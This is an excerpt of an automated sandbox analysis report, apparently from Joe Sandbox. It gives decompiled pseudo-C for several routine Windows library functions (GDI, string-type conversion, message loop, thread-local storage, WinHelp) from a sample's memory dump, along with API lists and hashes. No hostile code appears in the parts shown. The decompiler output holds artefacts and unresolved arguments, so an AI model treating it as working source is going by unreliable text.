					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
					_t138 = _t178 + 0x80;
					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
					_t188 = _t122;
					 *(_t178 + 0xf8) = _t122;
					if(_t122 != 0) {
						_t153 =  *(_t178 + 0xf0);
						__eflags = _t122 - _t153;
						if(__eflags > 0) {
							 *(_t178 + 0xf8) = _t153;
						}
					} else {
						 *(_t178 + 0xf8) = _t175;
					}
					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
					_push(0x42e4b0);
					_push(0x42e4b0);
					_push(_t175);
					_push(_t175);
					_push(_t175);
					E0041AE9C(_t178, _t188);
					_t126 =  *((intOrPtr*)(_t178 + 0x114));
					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
					} else {
						 *((intOrPtr*)(_t180 - 0x24)) = 3;
						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
						 *(_t180 - 0x18) = _t175;
						if(E00415006(_t178, _t175, _t180 - 0x28, 0) == 0) {
							E00414F60(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
						}
					}
					E00427C71(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
					_t100 = _t175;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return _t100;
			}

0x00426d8c
0x00426d98
0x00426d9d
0x00426da0
0x00426da6
0x00426da9
0x00426daf
0x00426dba
0x00426dba
0x00426db1
0x00426db3
0x00426db3
0x00426dbc
0x00426dc4
0x00426dca
0x00426dd7
0x00426ddf
0x00426dee
0x00426df8
0x00426dfb
0x00426e01
0x00426e04
0x00426e06
0x00426e09
0x00426e14
0x00426e14
0x00426e0b
0x00426e0d
0x00426e0d
0x00426e1f
0x00426e23
0x00426e28
0x00426e30
0x00426e3d
0x00426e4a
0x00426e62
0x00426e6a
0x00426e6f
0x00426e75
0x00426e7b
0x00426e85
0x00426e8a
0x00426e9b
0x00426ea6
0x00426eaf
0x00426ebb
0x00426ebe
0x00426ed0
0x00426ede
0x00426eec
0x00426eef
0x00426ef1
0x00426ef7
0x00426f01
0x00426f07
0x00426f09
0x00426f0b
0x00426f0b
0x00426ef9
0x00426ef9
0x00426ef9
0x00426f19
0x00426f24
0x00426f25
0x00426f26
0x00426f27
0x00426f28
0x00426f2b
0x00426f30
0x00426f38
0x00426f3b
0x00426f44
0x00426fa0
0x00426f57
0x00426f57
0x00426f68
0x00426f76
0x00426f7e
0x00426f88
0x00426f94
0x00426f94
0x00426f88
0x00426fb2
0x00426fb7
0x00426fb9
0x00426fbf
0x00426fc7

APIs

__EH_prolog.LIBCMT ref: 00426D8C
GetDC.USER32(?), ref: 00426E7B
ReleaseDC.USER32 ref: 00426EAF
GetDeviceCaps.GDI32(?,00000058), ref: 00426EC8
GetDeviceCaps.GDI32(?,0000005A), ref: 00426ED8

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0042E4B0,0042E4B0), ref: 00426FA0

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDeviceH_prolog$ReleaseScrollShow
String ID:
API String ID: 603669091-0
Opcode ID: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction ID: f5d210ee154f7f1b627b2ce3caee5c8d10a4320e645ae6f080698531d27b521b
Opcode Fuzzy Hash: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction Fuzzy Hash: E0716870600A00DFCB29DF68D984AAABBF5FF48310F51456EE56ACB3A1DB34E841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A040, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A040(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x42f5e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x439f04; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x439efc; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00406830(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406330(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x439eec; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x42f5cc, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x42f5c8, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x439f04 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x0040a043
0x0040a045
0x0040a04a
0x0040a055
0x0040a056
0x0040a05d
0x0040a063
0x0040a066
0x0040a06f
0x0040a0af
0x0040a0b2
0x0040a0db
0x00000000
0x0040a0e1
0x0040a0e4
0x0040a0e6
0x0040a0eb
0x0040a0eb
0x0040a0fb
0x0040a105
0x0040a10b
0x0040a110
0x00000000
0x0040a112
0x0040a112
0x0040a11f
0x0040a124
0x0040a127
0x0040a129
0x0040a12f
0x0040a144
0x0040a14a
0x00000000
0x0040a14c
0x0040a15b
0x0040a163
0x00000000
0x0040a165
0x0040a16d
0x0040a16d
0x0040a163
0x0040a14a
0x0040a110
0x0040a0b4
0x0040a0b4
0x0040a0b9
0x0040a0bb
0x0040a0bb
0x0040a0cd
0x0040a0cd
0x0040a071
0x0040a074
0x0040a077
0x0040a087
0x0040a0a1
0x0040a175
0x0040a175
0x0040a0a7
0x0040a0a9
0x00000000
0x0040a0a9
0x0040a089
0x0040a089
0x0040a0aa
0x0040a0aa
0x00000000
0x0040a0aa
0x0040a087
0x0040a17d
0x0040a188

APIs

GetStringTypeW.KERNEL32(00000001,0042F5CC,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A07F
GetStringTypeA.KERNEL32(00000000,00000001,0042F5C8,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A099
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A0CD
MultiByteToWideChar.KERNEL32(00406E03,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A105
MultiByteToWideChar.KERNEL32(00406E03,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A15B
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A16D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction ID: 7d97f644f5b15e7df2d58104b9ea96a21cdc8e77f8ddbf007f82d689378feb8c
Opcode Fuzzy Hash: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction Fuzzy Hash: 7B41A272600219BFCF219F54CC85EAF3F79EB08350F104536F911E6290D3398961CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00424DFE, Relevance: 9.1, APIs: 6, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00424DFE(intOrPtr __ecx, void* __esi) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t58;
				signed int _t59;
				signed int _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				void* _t88;
				CHAR** _t90;
				void* _t91;

				E00406520(E0042A538, _t91);
				_t84 = __ecx;
				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
				_t51 = E00424F37(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
				if(_t51 == 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t51;
				}
				_t97 =  *((intOrPtr*)(_t91 + 8));
				 *((intOrPtr*)(_t91 - 0x18)) = 1;
				if( *((intOrPtr*)(_t91 + 8)) == 0) {
					L18:
					E0042500B(_t84, 1, 1);
					_t51 =  *((intOrPtr*)(_t91 - 0x18));
					goto L19;
				}
				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
				_push(0);
				_t88 = _t53;
				E0041A369(_t91 - 0x38, _t97);
				 *(_t91 - 4) = 0;
				 *(_t91 - 0x14) = 0;
				if(_t88 != 0) {
					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
				}
				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
				 *(_t91 - 0x10) = 0;
				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
					L15:
					if( *(_t91 - 0x14) != 0) {
						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
					}
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					E0041A3DB(_t91 - 0x38);
					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
					goto L18;
				} else {
					_t14 = _t86 + 0x10; // 0x10
					_t90 = _t14;
					do {
						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
						_t100 = _t58;
						 *_t86 = _t58;
						if(_t58 == 0) {
							_t59 = GetSystemMetrics(0);
							asm("cdq");
							_t77 = 4;
							__eflags =  *(_t91 - 0x10);
							 *(_t90 - 0xc) = _t59 / _t77;
							if(__eflags == 0) {
								_t33 = _t90 - 8;
								 *_t33 =  *(_t90 - 8) | 0x08000100;
								__eflags =  *_t33;
							}
							goto L12;
						}
						if(E00417214(_t90, _t100, _t58) == 0) {
							L14:
							 *((intOrPtr*)(_t91 - 0x18)) = 0;
							goto L15;
						}
						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
						 *(_t90 - 0xc) =  *(_t91 - 0x24);
						_push(0);
						_push( *_t90);
						_push( *(_t91 - 0x10));
						if(E0041BD0A( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
							goto L14;
						}
						L12:
						_t86 = _t86 + 0x14;
						_t90 =  &(_t90[5]);
						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
					goto L15;
				}
			}

0x00424e03
0x00424e11
0x00424e13
0x00424e16
0x00424e1d
0x00424f28
0x00424f2c
0x00424f34
0x00424f34
0x00424e26
0x00424e29
0x00424e30
0x00424f19
0x00424f1f
0x00424f24
0x00000000
0x00424f27
0x00424e3e
0x00424e44
0x00424e48
0x00424e4a
0x00424e51
0x00424e54
0x00424e57
0x00424e63
0x00424e63
0x00424e69
0x00424e6c
0x00424e6f
0x00424ef8
0x00424efc
0x00424f04
0x00424f04
0x00424f0a
0x00424f11
0x00424f16
0x00000000
0x00424e75
0x00424e75
0x00424e75
0x00424e78
0x00424e7b
0x00424e7f
0x00424e81
0x00424e85
0x00424e87
0x00424e89
0x00424ec7
0x00424ecf
0x00424ed0
0x00424ed3
0x00424ed6
0x00424ed9
0x00424edb
0x00424edb
0x00424edb
0x00424edb
0x00000000
0x00424ed9
0x00424e95
0x00424ef5
0x00424ef5
0x00000000
0x00424ef5
0x00424ea5
0x00424eb1
0x00424eb6
0x00424eb7
0x00424eb8
0x00424ec2
0x00000000
0x00000000
0x00424ee2
0x00424ee2
0x00424ee5
0x00424ee8
0x00424eee
0x00000000
0x00424ef3

APIs

__EH_prolog.LIBCMT ref: 00424E03
SendMessageA.USER32 ref: 00424E3E

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SelectObject.GDI32(?,00000000), ref: 00424E5D
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00424EA5
GetSystemMetrics.USER32 ref: 00424EC7
SelectObject.GDI32(?,?), ref: 00424F04

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
String ID:
API String ID: 3673216194-0
Opcode ID: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction ID: de80a065bd08caa13eaac1d81a7ee75adb8ed78cffc769f96184ddddc36f8564
Opcode Fuzzy Hash: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction Fuzzy Hash: 2D419D71A00219EFDB20DF95E8859AEFBB5FF88344F91402AF911A3250C7749A41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420341, Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00420341(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t59 = GetCapture;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E00413740(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E00413740(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E00420031(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t31 = _v32.message - 0x100;
						if(_t31 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E0041FA60(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t33 = E00413740(_t61, GetCapture());
								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t35 = _t31 - 1;
						if(_t35 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E0041FA60(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t37 = _t35 - 0xff;
						if(_t37 == 0) {
							_t55 = _v32.pt;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t58 = _v8;
							_push(_t55);
							_push(_t55);
							_t38 = _t62;
							 *_t38 = _t55;
							 *((intOrPtr*)(_t38 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E0041FCEC(_t56, _t59);
							} else {
								E0041F9E4(_t56);
							}
							goto L18;
						}
						_t42 = _t37;
						if(_t42 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E0041FE54(_t61, __eflags);
							} else {
								E0041FA94(_t57, _t58, _t59, _t60, __eflags);
							}
							_t44 = 1;
							return _t44;
						}
						if(_t42 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					E00429977(_v32.wParam);
					goto L19;
				}
			}

0x00420341
0x0042034a
0x00420350
0x00420356
0x00420430
0x00000000
0x00420430
0x00420369
0x00420379
0x00420429
0x0042042b
0x00000000
0x0042037f
0x00420381
0x00420399
0x0042039e
0x004203fe
0x00420404
0x0042040d
0x0042040d
0x00420412
0x00420416
0x00420418
0x0042041b
0x00420420
0x00420423
0x00000000
0x00000000
0x00420423
0x00000000
0x00420416
0x004203a0
0x004203a1
0x004203e9
0x004203ef
0x004203f7
0x004203f7
0x00000000
0x004203ef
0x004203a3
0x004203a8
0x004203c2
0x004203c5
0x004203cb
0x004203ce
0x004203cf
0x004203d0
0x004203d2
0x004203d4
0x004203d7
0x004203d9
0x004203e2
0x004203db
0x004203db
0x004203db
0x00000000
0x004203d9
0x004203ab
0x004203ac
0x00420441
0x00420447
0x00420449
0x00420452
0x0042044b
0x0042044b
0x0042044b
0x00420459
0x00000000
0x00420459
0x004203b4
0x00000000
0x00000000
0x004203ba
0x00000000
0x004203ba
0x0042043a
0x00000000
0x0042043a

APIs

GetCapture.USER32 ref: 00420352
SetCapture.USER32(?), ref: 00420362
GetCapture.USER32 ref: 0042036E
GetMessageA.USER32 ref: 00420388
DispatchMessageA.USER32 ref: 004203BA
GetCapture.USER32 ref: 00420418

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction ID: 30569a75dd2c4bd339c842e90f3a76f558b8e988fa3a176c692722e66ec8e41b
Opcode Fuzzy Hash: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction Fuzzy Hash: 103197717002299BDB21BBA5A8459AFB7E8EF40345FD0C43FA505D2253CE3C9C82D769

Uniqueness

Uniqueness Score: -1.00%

Function 00425A9A, Relevance: 9.1, APIs: 6, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E00425A9A(long* __ecx, signed int _a4, intOrPtr _a8) {
				void* _v8;
				void* __ebp;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t39;
				signed int* _t45;
				void* _t58;
				long* _t61;

				_push(__ecx);
				_t61 = __ecx;
				_t58 = TlsGetValue( *__ecx);
				if(_t58 == 0) {
					_t28 = E00425860(0x10);
					if(_t28 == 0) {
						_t58 = 0;
					} else {
						 *_t28 = 0x42e2ac;
						_t58 = _t28;
					}
					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
					_t8 = _t58 + 8; // 0x8
					_t45 = _t8;
					_t9 =  &(_t61[7]); // 0x4399c8
					_v8 = _t58;
					EnterCriticalSection(_t9);
					_t11 =  &(_t61[5]); // 0x4399c0
					_t48 = _t11;
					E00425807(_t11, _t58);
					_t12 =  &(_t61[7]); // 0x4399c8
					LeaveCriticalSection(_t12);
					goto L8;
				} else {
					_t2 = _t58 + 8; // 0x8
					_t45 = _t2;
					if(_a4 >=  *_t45 && _a8 != 0) {
						L8:
						_t32 =  *(_t58 + 0xc);
						if(_t32 != 0) {
							_t15 =  &(_t61[3]); // 0x4
							_t48 =  *_t15 << 2;
							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
						} else {
							_t14 =  &(_t61[3]); // 0x4
							_t33 = LocalAlloc(0,  *_t14 << 2);
						}
						 *(_t58 + 0xc) = _t33;
						if(_t33 == 0) {
							E0041007F(_t48);
						}
						_t17 =  &(_t61[3]); // 0x4
						E00406330( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
						_t21 =  &(_t61[3]); // 0x4
						 *_t45 =  *_t21;
						TlsSetValue( *_t61, _t58);
					}
				}
				_t39 =  *(_t58 + 0xc);
				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
				return _t39;
			}

0x00425a9d
0x00425aa0
0x00425aab
0x00425aaf
0x00425acd
0x00425ad4
0x00425ae0
0x00425ad6
0x00425ad6
0x00425adc
0x00425adc
0x00425ae2
0x00425ae6
0x00425aea
0x00425aea
0x00425aed
0x00425af1
0x00425af4
0x00425afb
0x00425afb
0x00425afe
0x00425b03
0x00425b07
0x00000000
0x00425ab1
0x00425ab4
0x00425ab4
0x00425ab9
0x00425b0d
0x00425b0d
0x00425b12
0x00425b25
0x00425b2a
0x00425b2f
0x00425b14
0x00425b14
0x00425b1d
0x00425b1d
0x00425b37
0x00425b3a
0x00425b3c
0x00425b3c
0x00425b4b
0x00425b5b
0x00425b60
0x00425b66
0x00425b6b
0x00425b6b
0x00425ab9
0x00425b71
0x00425b7c
0x00425b81

APIs

TlsGetValue.KERNEL32(004399AC,004397CC,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AA5
EnterCriticalSection.KERNEL32(004399C8,00000010,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AF4
LeaveCriticalSection.KERNEL32(004399C8,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B07
LocalAlloc.KERNEL32(00000000,00000004,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B1D
LocalReAlloc.KERNEL32(?,00000004,00000002,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B2F
TlsSetValue.KERNEL32(004399AC,00000000), ref: 00425B6B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction ID: c57f163ce3b349da1c9d5fe6ec490a1136d0d73abae7d2378efdd78ccfe309f5
Opcode Fuzzy Hash: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction Fuzzy Hash: 96318031200A15EFD724DF15E88AE6AB7B8FF44354F80C66AE416C7650E774F815CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041445E, Relevance: 9.1, APIs: 6, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0041445E(intOrPtr* __ecx, void* __edi) {
				struct HWND__* _t33;
				int _t35;
				void* _t37;
				void* _t52;
				void* _t53;
				intOrPtr* _t57;
				void* _t58;
				void* _t60;

				_t53 = __edi;
				E00406520(E00429E3C, _t60);
				_push(__ecx);
				_t57 = __ecx;
				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00424BFB() + 4));
				E00424BFB();
				E00412F19();
				 *(_t60 - 4) = 0;
				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
					 *((intOrPtr*)( *_t57 + 0xf0))();
				}
				_push(_t53);
				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t48 = _t57;
				_t58 = E00414CEF(_t57);
				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t33 = GetCapture();
				if(_t33 != 0) {
					SendMessageA(_t33, 0x1f, 0, 0);
				}
				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
				_t65 = _t35;
				if(_t35 == 0) {
					_push(0xffffffff);
					_push(0);
					_push(0xf107);
					E0041BB7E(_t48, _t65);
				}
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				E00424BFB();
				_t37 = E00412F2E();
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t37;
			}

0x0041445e
0x00414463
0x00414468
0x0041446b
0x00414475
0x00414478
0x00414480
0x0041448b
0x00414496
0x0041449c
0x0041449c
0x004144a2
0x004144b0
0x004144bd
0x004144c2
0x004144ca
0x004144d2
0x004144df
0x004144e4
0x004144ec
0x004144f3
0x004144f3
0x00414507
0x0041450d
0x00414510
0x00414512
0x00414514
0x00414515
0x0041451a
0x0041451a
0x0041451f
0x00414523
0x0041452b
0x00414535
0x0041453d

APIs

__EH_prolog.LIBCMT ref: 00414463
SendMessageA.USER32 ref: 004144B0
SendMessageA.USER32 ref: 004144D2
GetCapture.USER32 ref: 004144E4
SendMessageA.USER32 ref: 004144F3
WinHelpA.USER32 ref: 00414507

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

